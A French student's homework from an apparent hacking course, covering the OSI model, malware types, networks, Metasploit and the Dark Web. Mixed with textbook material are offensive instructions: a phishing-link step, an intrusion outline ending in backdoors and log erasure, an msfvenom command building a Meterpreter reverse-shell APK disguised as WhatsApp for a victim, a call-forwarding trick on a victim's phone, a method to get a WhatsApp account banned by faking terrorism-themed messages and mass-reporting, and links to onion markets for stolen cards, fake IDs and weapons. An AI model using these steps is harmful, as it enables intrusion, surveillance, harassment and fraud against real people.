0% ont trouvé ce document utile (0 vote)
76 vues18 pages

Modèles OSI, Malware, Réseaux et Sécurité

Le document présente divers outils et concepts liés à la cybersécurité, y compris des méthodes de phishing, des types de malwares, et des réseaux informatiques. Il aborde également des mesures de sécurité en ligne, l'utilisation de VPN, et les différences entre le Clear Net, le Deep Net, et le Dark Web. Enfin, il décrit des outils comme Metasploit et des techniques de piratage, ainsi que des conseils pour naviguer en toute sécurité sur Internet.

Transféré par

Fabio SOS
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
76 vues18 pages

Modèles OSI, Malware, Réseaux et Sécurité

Le document présente divers outils et concepts liés à la cybersécurité, y compris des méthodes de phishing, des types de malwares, et des réseaux informatiques. Il aborde également des mesures de sécurité en ligne, l'utilisation de VPN, et les différences entre le Clear Net, le Deep Net, et le Dark Web. Enfin, il décrit des outils comme Metasploit et des techniques de piratage, ainsi que des conseils pour naviguer en toute sécurité sur Internet.

Transféré par

Fabio SOS
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Exercice 1

1) Les noms des deux derniers outils vus au niveau 2 :

- Hacklock
- Code QR Generator

2) Installation du cinquième outil de Lazymux

3) Créons un lien de phishing via Zyphisher : http://127.0.0.1:9999 (je ne l'ai pas masqué
avec l'outil Facad7ng)

4) Le premier outil vu au niveau 2 était : l'outil Hydra

5) Les différentes couches du modèle OSI


Modèle OSI

Physique : Transmet les données sous forme de signaux électriques ou optiques.

Liaison de données : Gère le transfert de données entre appareils sur le même réseau.

Réseau : Gère le routage des données entre différents réseaux.

Transport : Garantit la livraison fiable des données entre deux ordinateurs.

Session : Gère les sessions de communication entre applications.


Présentation : Traduit les données pour les rendre compréhensibles pour les applications.

Application : Permet aux applications de communiquer entre elles.

Modèle TCP

Accès à la ligne : Combinaison des couches Physique et liaison de données (exemple :


Ethernet, Wi-Fi)

Internet : Gère le routage et l'adressage des paquets de données (exemple : IP).

Transport : Assure la communication fiable entre deux hôtes ( TCP, UDP)

Application : Combine les fonctions des couches Session, Présentation, et Application du


modèle OSI (ex : HTTP, FTP)

Exercice 2

1) Présentation de 7 Types de malwares :

Virus : Un programme qui s’attache à un fichier pour se propager. (Exemple : ILOVEYOU)

Cheval de Troie : Un logiciel qui semble légitime mais contient du code malveillant.
(Exemple : Zeus)

Ransomware : Chiffre les fichiers de la victime pour exiger une rançon. (Exemple :
WannaCry)

Ver : Se propage automatiquement via les réseaux. (Exemple : Conficker)

Spyware : Espionne les utilisateurs pour collecter des données sensibles. (Exemple :
Keylogger)

Adware : Affiche des publicités intrusives et parfois malveillantes. (Exemple : Fireball)

Rootkit : Cache l’activité malveillante pour éviter d’être détecté. (Exemple : Flame)

2) Comment se protéger d'un Malware et comment le reconnaître ?

C'est très important. Pour se protéger d'un malware, il faudrait utiliser un antivirus efficace et
mettre à jour régulièrement son système informatique. Il faudrait également être prudent
lorsqu'on télécharge des fichiers ou des logiciels en ligne.

- Pour reconnaître un Malware, voici quelques faits :


Un programme avec un nom bizarre ou sans rapport avec ce que tu as installé (ex. :
heykali123.exe)

Une icône générique ou différente de ce à quoi tu t’attendais.

Des fichiers ou dossiers qui apparaissent soudainement et dont tu ignores la provenance.

Des fenêtres pop-up qui surgissent sans prévenir, même quand tu ne fais rien.

Une redirection automatique vers des sites web douteux dès que tu ouvres ton navigateur.

Des alertes antivirus fréquentes concernant un fichier ou un programme spécifique.

Un logiciel qui se lance tout seul ou demande des autorisations suspectes (ex. : accès à la
caméra, modification de fichiers système).

Des programmes qui s'installent sans que tu les aies téléchargés ou approuvés.

Un logiciel avec des fautes de grammaire ou de syntaxe, souvent traduit maladroitement.

Des messages d'erreur incompréhensibles ou dans une langue inattendue.

Un bref exemple : Si tu vois une application "Free_Cash.exe" avec une icône de cadeau et
un design mal fait, il y a de grandes chances que ce soit un malware.

3) Un Ransom Logiciel vue en cours : Sara

4)Deux autres exemples : Encryptor, X-Ransom

8 enregistreurs de frappe (keyloggers)

Refog Keylogger : Logiciel complet permettant de surveiller les frappes clavier, les captures
d’écran et les activités en ligne.

Spyrix Free Keylogger : Un enregistreur gratuit qui suit les frappes clavier et envoie des
rapports.

Ardamax Keylogger : Petit et discret, il capture les frappes et enregistre les conversations en
ligne.

Elite Keylogger : Logiciel avancé qui capture non seulement les frappes, mais aussi les mots
de passe et l'activité en ligne.
KidLogger : Utilisé pour surveiller les enfants, il enregistre les frappes et les activités sur
ordinateur.

Actual Keylogger : Polyvalent, il enregistre les frappes clavier, prend des captures d’écran et
surveille l'activité web.

REFOG Personal Monitor : Un autre produit de REFOG, conçu pour surveiller les activités
personnelles et professionnelles.

Perfect Keylogger : Connue pour sa discrétion, cette solution capture les frappes clavier et
surveille les applications ouvertes.

Exercice 3

1) Réseaux informatiques : Un réseau informatique est un ensemble d'ordinateurs et


d'autres appareils connectés entre eux pour partager des ressources et des informations.

Les Types de Réseaux :

LAN ( Local Area Network) : Réseau local qui couvre une petite zone géographique comme
une maison ou un bureau

WAN (Wide Area Network) : Réseau étendu qui couvre de grandes zones géographiques,
comme des villes ou des pays

MAN (Metropolitan Area Network) : Réseau métropolitain qui couvre une ville ou une grande
zone urbaine

PAN (Personal Area Network) : Réseau personnel qui couvre une petite zone, généralement
autour d'un individu, comme des périphériques connectés via Bluetooth

VPN (Virtual Private Network) : Réseau privé virtuel qui permet de créer une connexion
sécurisée sur un réseau public

Topologies de réseaux :

Topologie en bus : tous les appareils sont connectés à un seul câble principal.

Topologie en étoile : tous les appareils sont connectés à un appareil central, comme un
routeur

Topologie en anneau : chaque appareil est connecté à deux autres appareils, formant un
cercle.
Topologie en maillage : chaque appareil est connecté à plusieurs autres appareils, offrant de
multiples chemins de communication

Topologie en arbre : C'est une combinaison de topologies en bus et en étoile, formant une
structure hiérarchique

2. Pour créer et configurer un point d'accès Wi-Fi :

1) Sur un smartphone (Android) :


Ouvrir les Paramètres
Aller dans Connexions ou Réseaux et Internet
Sélectionner Point d'accès mobile et modem
Activer Point d'accès mobile
Configurer le nom du réseau (SSID) et le mot de passe

2) Sur un ordinateur (Windows 10) :


- Ouvrir les Paramètres
- Aller dans Réseau et Internet
- Sélectionner Point d'accès mobile
- Activer Partager ma connexion Internet avec d'autres appareils
- Configurer le nom du réseau (SSID) et le mot de passe

3) L'invite de commande est un interpréteur de lignes de commande sur les systèmes


d'exploitation Windows. Elle permet d'exécuter des commandes pour gérer le système et les
fichiers.

Importance :
Gestion des fichiers : copier, déplacer, supprimer et renommer des fichiers

Administration système : configurer des paramètres système et des réseaux

Automatisation : exécuter des scripts pour automatiser des tâches répétitives.

Dépannage : diagnostiquer et résoudre des problèmes système

4) Oui, il est possible de pirater un ordinateur dans un réseau filaire.

Scan du réseau : Identifier les appareils connectés au réseau à l'aide d'outils comme Nmap
ou Wireshark.

Repérer les failles de sécurité (services non sécurisés, logiciels obsolètes) avec des outils
comme Nessus

Utiliser des failles (par exemple, une mauvaise configuration ou un service vulnérable) pour
s'introduire dans le système via des exploits connus, comme avec Metasploit
Une fois à l’intérieur, essayer d’obtenir des droits administratifs pour un contrôle complet du
système.

Installer des backdoors pour garder un accès permanent.

Effacer les journaux pour ne pas laisser de preuve de l’intrusion.

5) Voici quatre commandes réseaux :

ipconfig : Affiche la configuration IP des interfaces réseau sur un système Windows.

ping : Vérifie la connectivité réseau entre deux appareils en envoyant des paquets de
requête.

tracert : Trace le chemin emprunté par les paquets pour atteindre une destination réseau.

netstat: Affiche les connexions réseau actives et les ports d'écoute sur l'ordinateur.

Exercice 4

1) Outil pour créer un bot : Baileys

Baileys : Une bibliothèque Node.js utilisée pour créer des bots WhatsApp, permettant l'envoi
et la réception de messages et la gestion des groupes.

2) Code de bannissement d'un utilisateur par un bot


```javascript
const { WAConnection, MessageType } = require('@adiwajshing/baileys');
const conn = new WAConnection();

conn.on('open', () => {
console.log('Connected');
});

conn.on('chat-update', async (chat) => {


if (!chat.hasNewMessage) return;
const message = chat.messages.all()[0];

// Command to ban user


if (message.message.conversation === '!ban') {
const userToBan = message.key.remoteJid;
await conn.modifyChat(userToBan, 'delete');
console.log(`Banned user: ${userToBan}`);
}
});

conn.connect();
```

3) Clonage informatique : C'est une création d'une copie exacte d'un disque dur ou d'une
partition.

Contrôle d'un téléphone sur KALI : Utiliser Kali NetHunter et des outils comme Scrcpy pour
contrôler l'écran du téléphone depuis Kali Linux (Chef vous aviez supprimé la partie intégrale
de ce cours dans le groupe : sur le clonage). C'est juste mes recherches ça.

4) Les caractéristiques principales de Kali Linux :

Distribution Linux dédiée à la sécurité informatique


Plus de 600 outils de sécurité et de hacking
Environnement de bureau XFCE par défaut
Fonctionne sur plusieurs plateformes, y compris ARM.
Mises à jour régulières des outils et du système

5) Outils pour obtenir des informations sur un internaute

Maltego : C'est un outil d'OSINT pour collecter et visualiser des informations sur des
individus, des groupes, des domaines et des réseaux sociaux

theHarvester : C'est un outil d'OSINT pour récolter des informations sur des domaines,
adresses email, sous-domaines, noms de serveurs et adresses IP

Chef désolé mais ici je vais continuer avec l'exercice : 6, 7, et 8 avant de revenir sur le 5

Exercice 6
1) La page d'accueil de l'outil Infect :

2) Brute Force : Une attaque par force brute est une méthode de piratage qui consiste à
essayer toutes les combinaisons possibles pour trouver un mot de passe ou une clé de
chiffrement.

Les différences avec les autres méthodes :

- Attaque par dictionnaire : Elle utilise une liste prédéfinie de mots courants plutôt que
d'essayer toutes les combinaisons possibles.
- Phishing : Pour tromper l'utilisateur pour obtenir ses informations de connexion en se
faisant passer pour un site de confiance.
- Injection SQL : exploite les vulnérabilités des bases de données pour obtenir des
informations non autorisées.

3) La méthode par force brute peut être extrêmement lente et inefficace, surtout si le mot de
passe est long et complexe. De plus, les systèmes modernes utilisent souvent des mesures
de sécurité comme le verrouillage des comptes après plusieurs tentatives qui n'ont pas porté
fruits.

4) La page d'accueil de l'outil Hydra :


Exercice 7

1) Trois mesures de sécurité sur l'internet

Utiliser des mots de passe forts et uniques : éviter les mots de passe simples et les
réutilisations

Activer l'authentification à deux facteurs (2FA)

Ajouter une couche de sécurité supplémentaire pour les connexions

Mettre à jour régulièrement les logiciels et les systèmes : Installer les dernières mises à jour
de sécurité pour éviter les vulnérabilités

2. Deux outils qui aident à préserver notre anonymat en ligne

Tor : Un navigateur qui permet de naviguer de manière anonyme en faisant transiter le trafic
internet par plusieurs serveurs.

VPN (Virtual Private Network) : Chiffre la connexion internet et masque l'adresse IP de


l'utilisateur.

3) Cinq VPN que je connais

NordVPN
ExpressVPN
CyberGhost
Surfshark
Private Internet Access (PIA)

Exercice 8

1)Le Dark Web est une partie de l'Internet qui n'est pas indexée par les moteurs de
recherche traditionnels et nécessite des logiciels spécifiques, comme Tor, pour y accéder. Il
est souvent associé à des activités illégales, mais peut également être utilisé pour des
communications anonymes et sécurisées

2) La différence entre Deep Net, Dark Web et Clear Net

- Clear Net : C'est la partie de l'Internet accessible par les moteurs de recherche
traditionnels.
- Deep Net : La partie de l'Internet qui n'est pas indexée par les moteurs de recherche, mais
n'est pas forcément illégale (par exemple, les bases de données protégées par mot de
passe)
- Le Dark Web : Lui c'est une sous-partie du Deep Net qui nécessite des logiciels
spécifiques pour y accéder et est souvent associée à des activités illégales

3) Tor Browser est un navigateur qui permet d'accéder au Dark Web en anonymisant le trafic
en le faisant passer par plusieurs relais (noeuds) dans le réseau Tor

4) Résumé de la procédure pour accéder au Dark web :

Télécharger et installer Tor Browser depuis le site officiel.


Ouvrir Tor Browser et laisser la connexion au réseau Tor se faire
Naviguer en utilisant les adresses .onion spécifiques au Dark Web. Quelques exemples :

Pirates du Dark Web pour pirater des comptes de réseaux sociaux : -


http://n3a5vyxy6sfuh3n5cwjhvnefkqvcdpzpyi7okfpqbairv2syor42e3yd.onion

Comptes Paypal, Ebay et bancaires Premium - AccMarket : -


http://55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion

Cardshop - SOLDE CONNU CVV aux États-Unis et CC et CVV dans le monde : -


http://gjq7bnlsu6j2s2klzerelpwppcvlklsmdffa3rl7mq6wvjmtcgvfqfyd.onion

Extraction de Bitcoin avec électricité volée Darkmining :-


http://jbtb75gqlr57qurikzy2bxxjftzkmanynesmoxbzzcp7qf5t46u7ekqd.onion

Bitcoin Investment Trust - gagnez 5 à 9 % par semaine ! :-


http://jhi4v5rjly75ggha26cu2eeyfhwvgbde4w6d75vepwxt2zht5sqfhuqd.onion

Magasin mobile - Meilleur fournisseur de téléphones portables débloqués : -


http://rxmyl3izgquew65nicavsk6loyyblztng6puq42firpvbe32sefvnbad.onion

Kamagra 4 Bitcoin – Comme le Viagra mais moins cher :-


http://vhlehwexxmbnvecbmsk4ormttdvhlhbnyabai4cithvizzaduf3gmayd.onion

Faux passeports et cartes d'identité pour les services d'identité Bitcoin Onion : -
http://ymvhtqya23wqpez63gyc3ke4svju3mqsby2awnhd3bk2e65izt7baqad.onion

Magasin britannique d'armes et de munitions : -


http://k6m3fagp4w4wspmdt23fldnwrmknse74gmxosswvaxf3ciasficpenad.onion

USfakeIDs - Magasin de fausses pièces d'identité américaines : -


http://lqcjo7esbfog5t4r4gyy7jurpzf6cavpfmc4vkal4k2g4ie66ao5mryd.onion

5) Le processus que TOR utilise pour maintenir notre anonymat c'est :

Tor utilise un processus appelé onion routing , où le trafic internet est chiffré et acheminé à
travers plusieurs noeuds dans le réseau Tor, chaque relais ne connaitra que l'adresse IP
précédente et suivante Cela rend extrêmement difficile de tracer l'utilisateur final
6) Deux autres mesures de protection avant d'entrer dans le Dark Web :

Utiliser un VPN avant de se connecter au réseau Tor pour ajouter une couche
supplémentaire de confidentialité

Ne pas utiliser d'informations personnelles comme les identifiants habituels pour éviter de se
faire identifier

Exercice 5

1) Présentation de Metasploit

Metasploit est un framework de tests d'intrusion (pentesting) qui permet de tester la sécurité
des systèmes et réseaux en utilisant des exploits pour identifier et exploiter des
vulnérabilités. Il est largement utilisé pour effectuer des audits de sécurité et des évaluations
des risques. Il est constitué de divers modules permettant de mener des attaques variées,
allant des exploits aux post-exploitations.

Les six rôles principaux de Metasploit :

Exploitation de vulnérabilités : exploiter des failles de sécurité pour prendre le contrôle d'un
systèm.

Création de payloads : générer des payloads qui s'exécutent sur les systèmes compromis

Post-exploitation : maintenir un accès au système compromis et recueillir des informations


supplémentaires

Scanning et reconnaissance : identifier les vulnérabilités d'un réseau ou d'un système

Tests d'intrusion : tester la sécurité des réseaux, systèmes, applications et autres


infrastructures

Automatisation des attaques : automatiser des tâches de piratage pour améliorer l'efficacité
des tests

2) Cinq commandes de Metasploit

show exploits : pour afficher tous les exploits disponibles dans Metasploit

search <exploit> : rechercher un exploit spécifique par nom

use <exploit> : sélectionner un exploit à utiliser pour une attaque

set PAYLOAD <payload> : Ça définit le payload à utiliser avec un exploit donné


exploit : lance l'attaque avec l'exploit et le payload configurés

3) La page d'accueil de Metasploit

Pour accéder à la page d'accueil de Metasploit, il faut exécuter la commande suivante :

./msfconsole

L''interface principale de Metasploit ressemble généralement à ceci :

__ __ _______ ____
___ | \/ | | ___ | | \
| \ | |\/| | | | | | | |\/
| \ | | | | | |___| |____ |____
| \|_| |_| |_______|______|_____|

Metasploit Framework vX.XX


[ ... ]
msf >

4) Pour créer un fichier APK (Android) avec un payload Metasploit, j'utilise la commande
suivante avec msfvenom :

./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R >


/storage/emulated/0/whatsapp.apk

Ça va générer un fichier APK contenant un payload de type


android/meterpreter/reverse_tcp, qui est configuré pour se connecter à l'adresse IP spécifiée

5) Une fois que la victime a ouvert le fichier APK sur son appareil, le payload Meterpreter
s'exécutera, et une session Meterpreter sera établie. Je peux alors commencer à interagir
avec l'appareil compromis, par exemple :

Prendre le contrôle à distance (exécuter des commandes sur l'appareil victime)

Accéder aux fichiers et données (télécharger des fichiers, capturer des informations
sensibles)

Maintenir l'accès

Approfondissement :
3) Pour recevoir les appels de quelqu'un c'est simple : je prends le téléphone de ma victime :
dans la partie appel téléphonique je tape : **21*mon numéro de téléphone# et c'est bon.
Tous les appels de la victime, je les aurai aussi. Pour désactiver : ##21*mon numéro#

6) Ce que je peux faire : Bannir un utilisateur de WhatsApp. Je développe ma méthode de


bannissement :

🎁🎁🎁🎁🎁🎁🎁🎁🎁 BAN UN COMPTE WHATSAPP 🎁🎁🎁🎁🎁🎁🎁🎁🎁🎁


"

POUR BANIR UN COMPTE WHATSAPP, C'EST TRÈS FACILE, MAIS LES PRÉREQUIS
NE SONT PAS FACILES À TROUVER !!!

1) FAKE CHAT : LES FAKE CHATS SONT L'UNE DES FONCTIONNALITÉS DES
WHATSAPP MOD, ÇA PERMET D'ÉCRIRE UN MESSAGE À LA PLACE DE TON
INTERLOCUTEUR DANS UNE DISCUSSION WHATSAPP (ON PEUT LES TROUVER
DANS CERTAINS WHATSAPP MOD).

2) SCRIPT DE BAN OU SUPPORT DE BAN : CE SONT DES MESSAGES ILLÉGAUX,


PARLANT DE TRFIC D'ARMES, DE TRFIC D'ÊTRES HUMAINS, DE PRNGRAPHIE,
ETC...(ON PEUT LES TROUVER SOIT DANS LES GROUPES OU CANAUX TELEGRAM,
OU ON PEUT LES CRÉER SOI-MÊME EN TENANT COMPTE DES ÉVÉNEMENTS EN
TENDANCE (SINON ÇA NE FONCTIONNERA PAS), APRÈS LES TRADUIRE EN
ANGLAIS, EN INDIEN OU DANS D'AUTRES LANGUES POUR PLUS D'EFFET).

3) UN NUMÉRO BIO : C'EST UN NUMÉRO WHATSAPP QUI A PLUS DE 3, 4, 5 ANS SUR


WHATSAPP (UN UTILISATEUR DIGNE DE CONFIANCE QUI N'A JAMAIS ÉTÉ BAN).

✍🏿✍🏿✍🏿✍🏿✍🏿 PRATIQUE ✍🏿✍🏿✍🏿✍🏿✍🏿


UNE FOIS QUE TU ES CONNECTÉ À TON WHATSAPP MOD, TU OUVRES LA
DISCUSSION ENTRE TOI ET TA VICTIME, TU LUI ENVOIES UN MESSAGE, PUIS TU
COLLES LE SCRIPT DE BAN DANS LA ZONE DU TEXTE (N'OUBLIE PAS D'INSÉRER LE
NUMÉRO DE LA VICTIME DEDANS). (N'OUBLIE PAS D'ACTIVER LA FONCTIONNALITÉ
FAKE CHAT DANS LES PARAMÈTRES DU WHATSAPP MOD, CERTAINS N'EN ONT
PAS). APRÈS, TU VERRAS LE BOUTON DE LA FONCTION FAKE CHAT POUR
INVERSER L'ENVOI DU MESSAGE, ET LE MESSAGE S'AFFICHERA COMME SI C'ÉTAIT
LA VICTIME QUI TE L'A ENVOYÉ. TU PEUX ENVOYER 2 À 3 FOIS LE SCRIPT DE BAN
EN UTILISANT LE FAKE CHAT, PUIS TU SIGNALES LES MESSAGES DES SCRIPTS DE
BAN PLUS DE 20 À 30 FOIS ET C'EST FINI. NORMALEMENT, LE COMPTE DEVRAIT
ÊTRE BAN DANS LES 10 MINUTES QUI SUIVENT...
POUR VÉRIFIER SI C'EST BAN OU NON, IL TE SUFFIT DE FAIRE COMME SI TU
VOULAIS CRÉER UN COMPTE WHATSAPP AVEC LE NUMÉRO DE TA VICTIME, ET
C'EST FINI...

VOICI UN SCRIPT DE BAN ✍🏿✍🏿✍🏿✍🏿✍🏿


Ban WhatsApp Report Wow नमस्कार प्रिय व्हाट्सएप उपयोगकर्ता, मेरे किमो नाम का यट् ू यब
ू र। मैं काम
कर रहा हूँ व्हाट्सएप और यट्ू यब
ू के लिए और मैं आतंकवाद के लिए काम करता हूं। WhatsApp हाल ही में
मेरे द्वारा कब्जा कर लिया गया 5000 अरब डॉलर की टीम। मैं व्हाट्सएप ने इसमें फीचर्स जोड़े व्हाट्सएप
सबसे अच्छा बन गया है दनि ु या। मेरा व्हाट्सएप ऐप, परू ी दनिु या द्वारा उपयोग किया जाता है सफल रहा है ।
अब तक तो सब ठीक है इस संशोधित संस्करण को प्राप्त करने के लिए, आपको 500 बिलियन ट्रांसफर करना
होगा USD के माध्यम से मेरे खाते में हमारे लिए क्रिप्टोकरें सी एक्स
https://api.whatsapp.com/send?phone=(+LE NUMÉRO DE LA VICTIME)

𝗣𝗿፝֟𝗼𝗳𝗲𝘀𝘀𝗲𝘂𝗿 𝗗𝗢𝗠𝗜𝗡𝗨𝗦

Vous aimerez peut-être aussi